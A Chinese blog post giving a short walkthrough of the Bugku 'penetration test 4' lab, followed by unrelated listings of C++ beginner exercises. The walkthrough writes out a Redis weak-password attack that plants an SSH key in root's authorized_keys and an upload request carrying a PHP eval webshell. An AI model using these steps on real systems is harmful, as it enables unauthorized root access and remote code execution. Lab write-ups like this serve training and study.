bugku渗透测试4-writeup

已于 2025-01-06 15:53:48 修改
阅读量542 收藏 6
点赞数 8
文章标签: 网络安全
于 2025-01-06 14:19:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/vsdfbhsdhsdfh/article/details/142696932
版权

又来了一个新的靶场,这个靶场打下来我觉得关键就是信息收集,走了很多的弯路。

一、入口的漏洞是在登录的时候去抓包,修改action的值

二、对内网进行fscan扫描,发现192.168.0.202的6379端口存在redis弱口令

三、对这个主机进行全端口的扫描,发现存在22000 ssh端口,那么可以联想到时redis写入公钥来连接主机

ssh-keygen -t rsa

cd /root/.ssh/

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n")> key.txt

cat key.txt | redis-cli -h 目标IP -x set xxx

//以上步骤在自己的攻击机器上执行

config set dir /root/.ssh/

config set dbfilename authorized_keys

save

cd /root/.ssh/

ssh -i id_rsa root@目标IP

四、连接获取flag

五、PageController前台任意文件上传

POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: 172.16.0.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617
Content-Length: 262

----------------------------921378126371623762173617
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain

<?php echo '123_test';@eval($_GET[cmd])?>
----------------------------921378126371623762173617--

六、没想到这个第一台机器的密码,在第二台里面

七、扫描第一台主机、使用之前的密码连接成功。

八、最后一个flag是要去看cms的数据库里面,这个数据库是sqlite

把这个数据库下载下来,登录密码是加密的,就直接用token

把token写入到cookie中

获取最后一台主机的root密码

bbiggl
关注
c++编程 如何判断三角形类别
qq_42289041的博客
05-10 6159
代码如下: #include #include<stdio.h> using namespace std; void Judge(int m_num1,int m_num2,int m_num3) { while(scanf("%d %d %d",&m_num1,&m_num2,&m_num3)!=EOF) { if(!(m_num1+m_num2<=m_...
信息学奥赛一本通(C++版)1018:其他数据类型存储空间大小
weixin_47886660的博客
06-06 485
1018:其他数据类型存储空间大小题目:题目描述输入输出输入样例输出样例程序样本 题目: 题目描述 分别定义bool,char类型的变量各一个,并依次输出它们的存储空间大小(单位:字节)。 输入 (无) 输出 一行,两个整数,分别是两个变量的存储空间大小,用一个空格隔开。 输入样例 (无) 输出样例 (无) 程序样本 #include<cstdio> int main(void){ printf("%d %d",sizeof(bool),sizeof(char)); re
入门三角形类别
weixin_30311605的博客
04-20 1439
题目描述 输入三个整数,以这三个数为边长,判断是否构成三角形;若不能输出"no",若构成三角形,进一步判断它们构的是:锐角三角形或直角三角形或钝角三角形.分别输出"ruijiao","zhijiao","dunjiao" 输入 三个整数 输出 一个字符串 样例输入 3 4 5 样例输出 zhijiao 提示 两个短边的平方和等于一个长边的平方时为直角三角形两个短边的平方和...
1018 - 三角形类别
南风的博客
09-20 454
若不能输出 no。若构成三角形,进一步判断它们构的是:锐角三角形或直角三角形或钝角三角形。3)输入的3条边不一定能保证第一条边是最短的,第二条边是第二长的,第三条边是最长的,所以我们需要对3条边进行排序,使用分支语句进行排序。2)确定选用什么结构,这里需要我们先判断能否构成三角形,应该选用双分支结构,在能构成三角形的情况下再进一步分析属于哪种三角形。1)明确输入输出有几个,这里输入有3个,都是int类型,输出有1个,是字符串类型。两个短边的平方和小于一个长边的平方时为钝角三角形
三角形分类(C++
m0_73333789的博客
08-11 691
洛谷P5717 【深基3.习8】三角形分类 题解
信息学奥赛一本通(c++)题号:1018
北港
08-04 3369
1016:整型数据类型存储空间大小 题目描述 分别定义int,short类型的变量各一个,并依次输出它们的存储空间大小(单位:字节)。 输入 (无) 输出 一行,两个整数,分别是两个变量的存储空间大小,用一个空格隔开。 输入样例 (无) 输出样例 (无) 代码 #include <iostream> using namespace std; int main(){ int a; short int b; cout<<sizeof(a)<<" "&
三角形类别判断
07-11
在编程领域,三角形类别判断是一项基础但重要的任务,它涉及到几何学和计算机图形学的知识。这个任务通常在教育环境中,比如小学期的编程作业中出现,用来锻炼学生的逻辑思维和编程技能。在这个问题中,我们将使用...
入门】【入门三角形类别
最新发布
11-04
在计算机程序设计中,尤其是面向对象编程中,我们可能会创建一个"三角形"类别(也称为类或类结构),作为几何形状的一种抽象表示。三角形是一个基本的图形,它由三条线段(边)连接三个点(顶点)构成。这个类通常会...
几何形状分类:包含三角形、正方形、圆形的10000张图像数据集
这个数据集专注于三种基本的几何形状,即三角形、正方形和圆形,这些形状因其简单性在教学和研究中经常被用作入门案例。 ### 图像分类 图像分类指的是根据图像内容将其分配给不同类别或标签的过程。在本数据集中,...
Android 3D入门实例:OpenGL基础与三角形绘制
作者强调,一个3D对象或"图元"(Primitives)可以通过三角形或多边形来创建,无论是复杂的高模(具有大量顶点)还是简单的低模(少量顶点)都属于同一个类别。 为了实践,教程指导读者创建一个名为Vortex的项目,其中...
信息学奥赛一本通(1018:其他数据类型存储空间大小)
05-03 883
1018:其他数据类型存储空间大小 时间限制: 1000 ms 内存限制: 65536 KB 提交数: 36770 通过数: 31958 【题目描述】 分别定义bool,char类型的变量各一个,并依次输出它们的存储空间大小(单位:字节)。 【输入】 (无) 【输出】 一行,两个整数,分别是两个变量的存储空间大小,用一个空格隔开。 【输入样例】 (无) 【输出样例】 (无) ...
信息学奥赛一本通 1018:其他数据类型存储空间大小 | OpenJudge NOI 1.2 03
君义NOIP的博客
12-27 2107
【题目链接】 ybt 1018:其他数据类型存储空间大小 OpenJudge NOI 1.2 03:其他基本数据类型存储空间大小 【题目考点】 sizeof运算符 sizeof可以求某常量、变量或类型占用的内存空间,单位是字节。 字符型变量占用的内存空间 char: 1字节 布尔型变量占用的内存空间 bool: 1字节 【题解代码】 #include <bits/stdc++.h> using namespace std; int main() { bool a; char b; co
【信息学奥赛一本通】1018:其他数据类型存储空间大小
sy820413的博客
10-03 421
【信息学奥赛一本通】1018:其他数据类型存储空间大小
信息学奥赛一本通:1018:其他数据类型存储空间大小
ffsdfg的博客
10-04 367
分别定义bool,char类型的变量各一个,并依次输出它们的存储空间大小(单位:字节)。一行,两个整数,分别是两个变量的存储空间大小,用一个空格隔开。
信息学奥赛一本通(C++版)第1018题目:其他数据类型存储空间大小 答案
XYN_13321702056的博客
07-23 335
信息学奥赛一本通(C++版)第1018题目:其他数据类型存储空间大小 答案
东方博宜OJ1018题解
m0_53518954的博客
12-01 998
这个题其实乍一看的话不是那么难,当然只是乍一看,对于小白来说刚看见是应该是没有体会到它的难点的。很多人这么一看是看不出来它给了什么重要或是有用的信息,但是你在后面做题的时候就会发现怎么确定最短边和最长边成为了一个难题。经过这么一番操作就可以得出a肯定是最大数了,而b是最小的。从中可以看到说是整数那么也就先是说明了定义函数的要求了。剩下的就是判断三角形的类型了主要就是if的运用。若构成三角形,进一步判断它们构的是:锐角三角形或直角三角形或钝角三角形。两个短边的平方和小于一个长边的平方时为钝角三角形
小学期 三角形类别判断 C++
一季南凉的博客
08-18 1716
定义二维点(Point)类,包含点的坐标x和y,再定义二维的三角形 (Triangle)类,在三角形类中能对三角形类别,首先判断输入的三个点能否 构成三角形,然后判断是否为等腰三角形、等边三角形、直角三角形、等腰 直角三角形。 提示: (1)思考程序中相等判断运算符是否采用“==”? (2)坐标值精确到小数点后3位, 2 =1.414, 3 =1.732, 5 =2.236,可以采 用以下测试数据: 等腰三角形:(0,0),(0,2),( 5 ,1) 等边三角形:(0,0),(0,2),( 3 ,1) 直角
信息学奥赛一本通|——1018:其他数据类型存储空间大小
Cody913913的博客
08-10 501
1018:其他数据类型存储空间大小 时间限制: 1000 ms 内存限制: 65536 KB 提交数: 39709 通过数: 34532 【题目描述】 分别定义bool,char类型的变量各一个,并依次输出它们的存储空间大小(单位:字节)。 【输入】 (无) 【输出】 一行,两个整数,分别是两个变量的存储空间大小,用一个空格隔开。 【输入样例】 (无) 【输出样例】 (无) #include<iostream> #include<cstdio> using n
【信息学奥赛】1018:其他数据类型存储空间大小(C++
weixin_62460981的博客
02-10 1837
今天来让我们来继续分析信息学奥赛一本通的第二十九题,也就是按照题目的要求取出其数据类型能存多少个字节。(并且,看了我的文章的人只有少数人点了赞,如果你觉得我写的好,或对你有帮助的话,请点赞!!!并收藏。谢谢!) 【题目描述及其目的】 1018:其他数据类型存储空间大小 时间限制: 1000 ms 内存限制: 65536 KB 提交数: 47366 通过数: 41277 【题目描述】 分别定义bool,char类型的变量各一个,并依次输出它们的存...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值